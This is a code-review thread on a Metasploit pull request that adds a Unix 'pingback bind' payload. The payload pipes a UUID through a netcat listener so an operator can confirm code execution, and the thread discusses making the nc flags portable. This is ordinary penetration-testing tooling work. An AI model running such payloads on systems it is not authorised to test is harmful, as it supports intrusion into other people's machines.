modules/payloads/singles/cmd/unix/pingback_bind.rb

```diff
@@ -0,0 +1,57 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/pingback'
+require 'msf/base/sessions/pingback'
+require 'msf/base/sessions/pingback_options'
+
+module MetasploitModule
+
+  CachedSize = 90
+
+  include Msf::Payload::Single
+  include Msf::Sessions::PingbackOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Pingback Bind TCP (via netcat)',
+      'Description'   => 'Accept a connection, send a UUID, then exit',
+      'Author'         =>
+        [
+          'asoto-r7'
+        ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::Pingback,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'netcat',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    pingback_uuid ||= generate_pingback_uuid
+    pingback_uuid.gsub!('-','')
+
+    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | nc -lp #{datastore['LPORT']}"
```

Comment:
This invocation of `nc -l` with `-p` is not portable. Some `netcat` implementations allow it, probably because it was how Hobbit's version did it, but others require `-p` to be omitted if `-l` is specified. The port goes at the end.

For instance, you can try on your Mac:

```
wvu@kharak:~$ nc -lp 4444
nc: missing port with option -l
usage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] [-p source_port] [--apple-delegate-pid pid] [--apple-delegate-uuid uuid]
	  [-s source_ip_address] [-w timeout] [-X proxy_version]
	  [-x proxy_address[:port]] [hostname] [port[s]]
wvu@kharak:~$
```

I'm not sure how you want to address this, but in the past, I've used `||` as a cheat code to get around portability issues in one command line. You can see it in action at https://github.com/rapid7/metasploit-framework/pull/10389#issuecomment-415931313.

Reply:
Love this suggestion.  Here's what I've changed:

```
-    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | nc -lp #{datastore['LPORT']}"
+    "printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | (nc -lp #{datastore['LPORT']} || nc -l #{datastore['LPORT']})"
```